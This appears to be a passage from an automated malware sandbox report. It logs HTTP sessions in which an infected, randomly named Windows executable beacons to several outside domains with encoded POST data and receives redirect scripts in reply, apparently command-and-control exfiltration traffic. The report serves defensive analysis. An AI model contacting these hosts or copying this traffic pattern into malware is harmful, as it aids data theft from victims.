                                                                Data Raw: 69 34 66 54 62 56 3d 6d 61 76 51 30 4f 34 37 4a 32 68 48 77 54 4a 6c 74 69 2b 61 65 45 6f 48 54 55 50 53 33 46 6a 53 6a 44 2f 76 31 4a 76 31 33 34 2b 2f 4e 63 5a 2f 6f 70 2b 55 77 46 32 46 4c 74 53 41 6a 70 37 4b 75 44 43 4d 6b 44 42 4b 54 6b 43 2b 6a 70 2b 78 52 53 55 7a 50 46 30 54 68 5a 69 4b 75 39 49 4d 4c 57 56 73 61 4c 79 62 2b 59 50 49 72 57 34 38 78 6a 66 78 31 73 6b 58 46 74 72 62 50 5a 34 41 30 6c 67 66 2b 4b 73 5a 78 72 6f 69 4b 54 45 76 57 2b 67 65 58 6d 47 71 5a 4b 4c 41 54 39 77 38 70 6c 38 44 71 50 35 4c 68 34 71 38 4a 38 4b 73 4d 6a 69 31 32 4a 69 74 6d 78 61 44 63 4a 37 48 33 62 4b 69 2f 31 62 67 74 58 5a 48 49 4e 6f 2b 63 46 66 47 5a 37 51 4a 33 76 2b 4d 6d 41 47 46 6f 6d 45 59 71 31 68 39 4a 34 39 54 62 6e 6f 7a 63 64 35 75 66 7a 51 54 4c 53 79 69 68 38 49 77 39 44 76 56 48 6b 32 6b 7a 57 34 5a 4b 52 70 42 58 76 75 75 33 65 59 33 6e 67 59 48 76 43 78 43 41 6c 58 57 31 39 69 65 36 7a 35 38 4d 70 36 46 64 37 58 71 53 51 6a 6d 35 79 71 32 68 55 77 51 2b 42 4d 45 34 47 4a 2f 4b 6d 2b [TRUNCATED]
                                                                Data Ascii: i4fTbV=mavQ0O47J2hHwTJlti+aeEoHTUPS3FjSjD/v1Jv134+/NcZ/op+UwF2FLtSAjp7KuDCMkDBKTkC+jp+xRSUzPF0ThZiKu9IMLWVsaLyb+YPIrW48xjfx1skXFtrbPZ4A0lgf+KsZxroiKTEvW+geXmGqZKLAT9w8pl8DqP5Lh4q8J8KsMji12JitmxaDcJ7H3bKi/1bgtXZHINo+cFfGZ7QJ3v+MmAGFomEYq1h9J49Tbnozcd5ufzQTLSyih8Iw9DvVHk2kzW4ZKRpBXvuu3eY3ngYHvCxCAlXW19ie6z58Mp6Fd7XqSQjm5yq2hUwQ+BME4GJ/Km+w+tT19m67d1xusjJa8YNTYesC1Dbl05ey5/VTXSWy9t12jNYU0DlVtHklcuu9SljdAMaWLVaR3V37UlHacknhyNUKvCKcb9kBaq465cSWOKom4SYAL9yCdW+7P93X8QNRzrMcEXztVCk0LVMtbmiYXfpWpAoU0g/tq78V/bzFBVSpX246GdAEjtGvh266jOnNtv8QiV2TW2hrYFco15mKi3o1gys5uwifGfBi9DdC9yoC/wOrdmvomNKovDfel2X37AEcWgmhScJnXtvVCx0Vv8uwDPOttEqxdbpLJs1qLeHpWr/HGYKViKcWf1CGZ03TAoCN7LfUniBFPASB6odbAryKOtKUknuJkbe1ixgf0sTRZLPykYivp7SeipI49yOZFOngcy02hqOPuAlGtia0dvizDik5ok+AEa7eLQb8q1keZHCqEm4jxzqAUicUmqDsDcIgHHYGi3UxWhhbZNPnii0dxAy7vdvl5CCzXG11GV0Fyfu1IOpUBll0F2zB2gNM+Lp2OCbDKhC9gWNPP4PWbve71VQ7zXNwrei2EhZq7dFEu1lojs5CF/NIYBOdOEAhv7JNSN36kb0yV4o/8N1QDlJm0GgickJDdcuarfy76lNkNdL4JEKdr8dYr1cEnUe5c07tbePZhnrYFqAi01LGOZAM+VeGoCJKj [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.6497513.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:50.198700905 CEST427OUTGET /kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.warriorsyndrome.net
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:50.664602041 CEST407INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:42:50 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 34 66 54 62 56 3d 72 59 48 77 33 2b 77 63 5a 33 4d 41 31 67 38 42 6c 54 6a 67 56 33 67 49 55 53 72 39 74 79 58 4b 39 53 36 46 6f 4c 44 4a 6d 4f 50 53 49 64 6c 76 74 72 71 77 72 6b 62 35 42 38 69 71 75 4c 57 4e 76 58 43 66 68 44 74 56 4b 58 57 68 6c 62 79 34 4d 56 41 61 44 6e 67 63 77 4d 65 47 69 2f 42 6f 59 45 63 76 58 6f 76 35 70 38 58 44 6d 54 63 47 73 79 4c 4e 71 73 63 4c 56 65 62 58 66 66 49 6a 6f 48 45 59 36 64 6b 3d 26 61 7a 71 3d 66 64 4b 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.6497523.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:55.715553999 CEST677OUTPOST /uxh9/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.ks1x7i.vip
                                                                Origin: http://www.ks1x7i.vip
                                                                Referer: http://www.ks1x7i.vip/uxh9/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 39 75 58 6f 5a 46 4d 61 66 35 4d 78 48 31 7a 41 79 4c 70 36 7a 66 64 47 68 37 53 47 36 37 6c 4e 76 71 48 63 48 41 67 62 75 63 2b 63 36 33 39 62 6f 78 44 45 66 43 7a 64 32 6b 78 33 35 68 37 54 50 75 51 64 75 58 52 71 72 44 48 44 69 61 46 74 46 38 6c 68 79 42 51 79 32 6e 46 2f 6c 62 54 51 48 30 65 6f 4d 57 69 7a 65 77 6f 4d 38 43 6b 30 7a 77 68 56 36 75 55 42 4f 6a 6f 36 68 6d 4c 49 65 42 33 37 31 64 64 2b 52 56 6c 4e 48 7a 79 35 67 76 65 4d 71 46 4e 61 73 43 34 56 6b 63 7a 68 39 6c 77 39 67 53 58 57 75 51 72 49 69 50 58 4d 4b 30 58 42 36 6a 63 54 53 4b 30 65 72 63 6d 69 45 61 49 66 78 34 41 37 4e 41 35 56
                                                                Data Ascii: i4fTbV=9uXoZFMaf5MxH1zAyLp6zfdGh7SG67lNvqHcHAgbuc+c639boxDEfCzd2kx35h7TPuQduXRqrDHDiaFtF8lhyBQy2nF/lbTQH0eoMWizewoM8Ck0zwhV6uUBOjo6hmLIeB371dd+RVlNHzy5gveMqFNasC4Vkczh9lw9gSXWuQrIiPXMK0XB6jcTSK0ercmiEaIfx4A7NA5V


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.6497543.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:58.259905100 CEST701OUTPOST /uxh9/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.ks1x7i.vip
                                                                Origin: http://www.ks1x7i.vip
                                                                Referer: http://www.ks1x7i.vip/uxh9/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 39 75 58 6f 5a 46 4d 61 66 35 4d 78 46 56 6a 41 2b 4d 39 36 31 2f 64 4a 6b 37 53 47 30 72 6c 4a 76 71 4c 63 48 42 56 41 74 6f 53 63 36 53 42 62 70 30 6a 45 4b 43 7a 64 75 30 78 79 6d 78 37 59 50 75 63 37 75 54 52 71 72 44 54 44 69 61 31 74 46 76 64 2b 77 52 51 30 36 48 46 39 6f 37 54 51 48 30 65 6f 4d 57 33 55 65 32 41 4d 38 79 30 30 7a 55 31 57 7a 4f 55 47 4a 6a 6f 36 6c 6d 4c 45 65 42 32 4c 31 63 78 59 52 58 64 4e 48 78 36 35 75 65 65 50 68 46 4e 51 78 79 34 4c 6a 70 76 73 79 69 52 61 6e 79 7a 56 37 78 58 69 6e 35 57 57 57 48 58 69 6f 7a 38 52 53 49 73 73 72 38 6d 49 47 61 77 66 6a 76 4d 63 43 30 63 32 6c 47 47 6c 67 38 47 4f 38 42 4a 76 31 33 2b 48 58 75 30 62 38 67 3d 3d
                                                                Data Ascii: i4fTbV=9uXoZFMaf5MxFVjA+M961/dJk7SG0rlJvqLcHBVAtoSc6SBbp0jEKCzdu0xymx7YPuc7uTRqrDTDia1tFvd+wRQ06HF9o7TQH0eoMW3Ue2AM8y00zU1WzOUGJjo6lmLEeB2L1cxYRXdNHx65ueePhFNQxy4LjpvsyiRanyzV7xXin5WWWHXioz8RSIssr8mIGawfjvMcC0c2lGGlg8GO8BJv13+HXu0b8g==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.6497553.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:00.816793919 CEST1714OUTPOST /uxh9/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.ks1x7i.vip
                                                                Origin: http://www.ks1x7i.vip
                                                                Referer: http://www.ks1x7i.vip/uxh9/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 39 75 58 6f 5a 46 4d 61 66 35 4d 78 46 56 6a 41 2b 4d 39 36 31 2f 64 4a 6b 37 53 47 30 72 6c 4a 76 71 4c 63 48 42 56 41 74 70 47 63 37 67 35 62 6f 53 72 45 59 79 7a 64 6d 55 78 7a 6d 78 37 2f 50 75 55 6e 75 54 56 51 72 42 72 44 67 35 39 74 53 75 64 2b 71 42 51 30 79 6e 46 67 6c 62 53 53 48 30 4f 6b 4d 57 6e 55 65 32 41 4d 38 30 77 30 30 41 68 57 2f 75 55 42 4f 6a 70 6f 68 6d 4b 74 65 42 75 39 31 63 31 75 51 6e 39 4e 45 52 4b 35 73 6f 43 50 6f 46 4e 65 68 69 35 59 6a 70 71 73 79 6a 35 38 6e 79 47 79 37 79 4c 69 6e 2f 66 62 4d 46 62 41 39 52 67 49 53 5a 6b 79 76 71 32 58 47 63 67 38 72 4a 5a 75 44 6c 52 63 67 6a 75 43 6d 39 54 51 31 48 31 39 37 43 48 54 62 66 4e 68 73 6c 69 6f 2b 39 38 34 64 46 4c 54 68 31 67 54 68 69 71 79 64 6b 6a 64 45 5a 69 75 77 4c 72 4c 41 50 67 74 75 32 56 37 73 76 48 33 39 77 38 65 54 4d 68 33 76 34 50 4f 69 39 5a 76 44 34 38 43 4f 31 32 2f 66 68 2b 45 6f 6d 51 4e 55 76 6b 47 6e 6e 70 6f 42 54 49 47 79 41 74 30 6c 5a 70 7a 6e 6d 76 37 6e 6f 6e 72 51 42 51 [TRUNCATED]
                                                                Data Ascii: i4fTbV=9uXoZFMaf5MxFVjA+M961/dJk7SG0rlJvqLcHBVAtpGc7g5boSrEYyzdmUxzmx7/PuUnuTVQrBrDg59tSud+qBQ0ynFglbSSH0OkMWnUe2AM80w00AhW/uUBOjpohmKteBu91c1uQn9NERK5soCPoFNehi5Yjpqsyj58nyGy7yLin/fbMFbA9RgISZkyvq2XGcg8rJZuDlRcgjuCm9TQ1H197CHTbfNhslio+984dFLTh1gThiqydkjdEZiuwLrLAPgtu2V7svH39w8eTMh3v4POi9ZvD48CO12/fh+EomQNUvkGnnpoBTIGyAt0lZpznmv7nonrQBQztQ32qZwpXR9DCYqLN4DH85TJyYnhEYCUb6Liyg6p5I8BpTAFAomc3ohWfLZsK5ogMYyggmr1CzJOxRwAGBAKZe/m3VwStg/5UDMl31CWNEK3fZlQiwAThq8x0R7d08rOMpVjVblNKvN/SufDBJJ0caD8rs363p3lPrB5Zj/hxkY1gtb08C/QniyR60TIRa3mSL3uS3ZnFzKDRq+mULu+p6cjU7X02c4J6YrlwM9eKOL86/ZTngr9onsFXxNKLs+JWeJ5jZXmNOFtrrxKTpl/XClKlSIOObu6tT3sFzjhcCoRHeN4461nLujUwIwtcwJJOsmkPeEzL/V4439aZS2ido8DSlI8QAfOAygTzeU5XWqHFuSLTn88ecCk6nq9C5hYW0fEw795un93KWJBnvx6YdFbDFMdg8YJG7Ci/YRk8ioAj3VBicoTwVDpfT+ybVBjWko74LCwAwSM78NRVqpsDwJpZ555fOM4X22Mpzvh8xT6sEPyk59DU+8JIPIAEsg8ABZ2Z6RHl6fSBNZDqrFy4HVqjdISH/LSkKKgtqhQF/WDTJ1WacjUsfA9VvHtt3BFzYsq74nCsuH6qrxwfNucZiR+bS8jM2U7HCjTxpzymBpcNhsxizEyYJtBt3p6vcL2SgqWWRe+wTwAwJp32RPQGfauAYcpoZ3Zj [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.6497563.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:03.361098051 CEST418OUTGET /uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.ks1x7i.vip
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:03.818226099 CEST407INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:43:03 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 7a 71 3d 66 64 4b 4c 26 69 34 66 54 62 56 3d 77 73 2f 49 61 77 64 45 48 61 6f 57 4e 67 2f 6a 2f 37 4a 68 37 75 64 47 6a 72 54 2b 37 4a 4e 65 34 36 6a 4f 54 77 46 42 33 35 71 79 77 51 74 6c 73 69 32 6c 42 67 54 58 73 6b 68 4b 31 52 7a 74 42 62 34 38 6e 54 39 2b 33 7a 54 33 6e 4c 52 2b 47 34 70 57 2f 54 51 6c 37 33 4e 55 71 65 48 4e 58 48 48 33 50 47 76 56 49 6d 55 46 36 58 4d 49 72 33 31 50 74 4f 63 6e 51 77 30 71 73 68 2f 52 52 77 75 38 37 62 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI="}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.64975784.32.84.32804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:08.912022114 CEST704OUTPOST /ml5l/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.pakmartcentral.shop
                                                                Origin: http://www.pakmartcentral.shop
                                                                Referer: http://www.pakmartcentral.shop/ml5l/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4d 37 57 47 75 44 41 78 58 63 30 61 6c 52 4e 44 38 66 64 35 44 69 36 35 78 64 2f 5a 58 78 48 67 31 6b 2f 46 7a 6e 62 4b 75 5a 4c 4a 44 41 4e 6d 74 75 59 37 48 4d 39 71 64 55 54 74 31 37 48 34 4d 5a 57 72 63 35 6e 32 6a 76 74 47 61 6c 47 33 48 4a 59 67 55 6b 77 69 44 4e 6f 46 4a 6a 30 46 53 32 33 33 53 54 4b 70 48 71 32 47 78 48 6b 30 68 4a 4b 6a 41 4a 62 44 48 61 42 42 72 69 66 77 55 61 7a 4f 55 47 50 6a 72 59 4e 6b 44 66 56 2f 34 59 49 61 47 69 61 6f 41 50 67 4e 53 49 36 71 58 57 7a 74 36 53 36 46 32 5a 44 6d 55 71 30 54 72 33 77 49 36 2f 77 73 32 6c 59 51 79 6d 54 42
                                                                Data Ascii: i4fTbV=n1VlSVnjPhGVM7WGuDAxXc0alRND8fd5Di65xd/ZXxHg1k/FznbKuZLJDANmtuY7HM9qdUTt17H4MZWrc5n2jvtGalG3HJYgUkwiDNoFJj0FS233STKpHq2GxHk0hJKjAJbDHaBBrifwUazOUGPjrYNkDfV/4YIaGiaoAPgNSI6qXWzt6S6F2ZDmUq0Tr3wI6/ws2lYQymTB


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.64975884.32.84.32804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:11.473912954 CEST728OUTPOST /ml5l/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.pakmartcentral.shop
                                                                Origin: http://www.pakmartcentral.shop
                                                                Referer: http://www.pakmartcentral.shop/ml5l/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4e 62 6d 47 74 6b 73 78 51 38 30 5a 70 78 4e 44 31 2f 64 31 44 69 6d 35 78 59 66 4a 58 6a 54 67 30 42 44 46 30 6d 62 4b 70 5a 4c 4a 45 77 4e 76 69 4f 59 6b 48 4d 35 49 64 56 44 74 31 2f 76 34 4d 59 6d 72 63 4f 7a 31 6a 2f 74 54 50 31 47 31 45 35 59 67 55 6b 77 69 44 4e 56 6f 4a 6a 73 46 53 48 6e 33 64 52 69 71 42 61 32 46 68 58 6b 30 6c 4a 4b 76 41 4a 62 68 48 62 64 72 72 6b 62 77 55 62 44 4f 56 54 6a 69 68 59 4e 6d 48 66 55 4c 7a 49 46 51 48 77 58 4a 4b 39 55 5a 43 62 33 4d 66 41 79 33 6d 68 36 6d 6b 4a 6a 6b 55 6f 73 68 72 58 77 69 34 2f 49 73 6b 79 55 33 39 53 32 69 68 77 66 44 42 4e 52 73 33 32 32 50 37 4c 56 46 79 47 6f 7a 75 67 3d 3d
                                                                Data Ascii: i4fTbV=n1VlSVnjPhGVNbmGtksxQ80ZpxND1/d1Dim5xYfJXjTg0BDF0mbKpZLJEwNviOYkHM5IdVDt1/v4MYmrcOz1j/tTP1G1E5YgUkwiDNVoJjsFSHn3dRiqBa2FhXk0lJKvAJbhHbdrrkbwUbDOVTjihYNmHfULzIFQHwXJK9UZCb3MfAy3mh6mkJjkUoshrXwi4/IskyU39S2ihwfDBNRs322P7LVFyGozug==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.64975984.32.84.32804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:14.037590981 CEST1741OUTPOST /ml5l/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.pakmartcentral.shop
                                                                Origin: http://www.pakmartcentral.shop
                                                                Referer: http://www.pakmartcentral.shop/ml5l/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4e 62 6d 47 74 6b 73 78 51 38 30 5a 70 78 4e 44 31 2f 64 31 44 69 6d 35 78 59 66 4a 58 6a 4c 67 31 33 33 46 79 46 6a 4b 6f 5a 4c 4a 48 77 4e 71 69 4f 5a 34 48 49 64 4d 64 56 50 54 31 39 58 34 4b 36 75 72 58 66 7a 31 70 2f 74 54 4e 31 47 34 48 4a 5a 39 55 6b 67 6d 44 4a 31 6f 4a 6a 73 46 53 45 76 33 5a 44 4b 71 61 61 32 47 78 48 6b 67 68 4a 4c 47 41 4a 6a 4c 48 61 70 52 73 55 37 77 56 34 37 4f 58 68 62 69 74 59 4e 6f 41 66 55 54 7a 49 4a 54 48 77 4c 72 4b 39 4d 2f 43 5a 72 4d 4a 6e 57 71 35 68 72 2b 34 4a 37 38 46 4a 64 4c 79 79 67 7a 39 70 30 4d 6b 7a 70 44 36 44 50 51 6a 31 33 61 50 66 4d 66 78 31 75 5a 39 4f 59 79 38 6b 68 61 30 46 56 47 2f 7a 37 2f 67 5a 47 67 2f 37 4c 77 38 34 4a 56 67 79 66 51 2f 48 71 57 45 31 30 50 73 45 55 51 69 49 34 4a 64 64 37 5a 69 63 79 72 61 69 38 4f 71 68 4e 65 52 4f 73 42 68 6d 44 2f 4b 51 63 46 47 64 65 55 72 2f 78 53 43 35 53 54 32 52 2f 58 4c 5a 42 58 78 75 79 54 5a 72 6c 31 66 57 41 6b 6a 5a 39 46 57 41 4b [TRUNCATED]
                                                                Data Ascii: i4fTbV=n1VlSVnjPhGVNbmGtksxQ80ZpxND1/d1Dim5xYfJXjLg133FyFjKoZLJHwNqiOZ4HIdMdVPT19X4K6urXfz1p/tTN1G4HJZ9UkgmDJ1oJjsFSEv3ZDKqaa2GxHkghJLGAJjLHapRsU7wV47OXhbitYNoAfUTzIJTHwLrK9M/CZrMJnWq5hr+4J78FJdLyygz9p0MkzpD6DPQj13aPfMfx1uZ9OYy8kha0FVG/z7/gZGg/7Lw84JVgyfQ/HqWE10PsEUQiI4Jdd7Zicyrai8OqhNeROsBhmD/KQcFGdeUr/xSC5ST2R/XLZBXxuyTZrl1fWAkjZ9FWAKSjheAFZzvTu22c3yu/DF4lCJ5NsD28c1F4R7tR9nWI8fzVQkp4QubVuyziO9YEoNf4qKUOD1o/HF6Xp3Piy2FKKWGFhWL4u9rTM7gbzyo8kZRiIeYLMYUdxB4sB5btj15Tn7cJyx6koIz/mIel/GeGyueYziyRjyjLAlWWfs98Y6Ktwyz2Bz0uFXcUdIt2Kd2NJvS2DfzEZbDoCSHxr8OEffwpWUURI+BYd9xMAjYDNvb6hUiDdpDdl4S5mmMOr8kuRt79TuxLxuWWlBqI/ZusQo0HEo0ulnZxIyv0QO1fI3hckeB20WTAYZpCtbzgIqeIqhNLAAt/eSNvF/THayi/5QIobvdgD89SbqUFuXzzsFQCIfP+dULK0no9IoXQWcFIpPvGkUdnwfv+NjP/poT3vAnWJVqwUPF7Q8P/ycUWuZeAFFon9W6P7lzg11P8y5ZZyaPd2zbaQnFu/BX6TLvzJ+b7ZxLA9BR21AlSF1vod64rGvRlK8gE0BiSPMtZbPQtgTMrVvw223pORzPelyT5ukT6mWJ2gcTtXOPJFu7gucpOREwrkRaNBwo49IBdNWDNd8FMpd5orx/YWEhkgApUPB0NNTkrIG1p/avI8jNbCaNOC9cYzX+EfV2TE+ZR8zShHjlf98tQ6YnFn3yLhlbZtPobvvVUSeNn [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.64976084.32.84.32804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:16.630333900 CEST427OUTGET /ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.pakmartcentral.shop
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:17.125127077 CEST1236INHTTP/1.1 200 OK
                                                                Server: hcdn
                                                                Date: Sun, 22 Sep 2024 15:43:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 10072
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                alt-svc: h3=":443"; ma=86400
                                                                x-hcdn-request-id: 44e72b8d54754fe66a36debaa82d2385-bos-edge2
                                                                Expires: Sun, 22 Sep 2024 15:43:16 GMT
                                                                Cache-Control: no-cache
                                                                Accept-Ranges: bytes
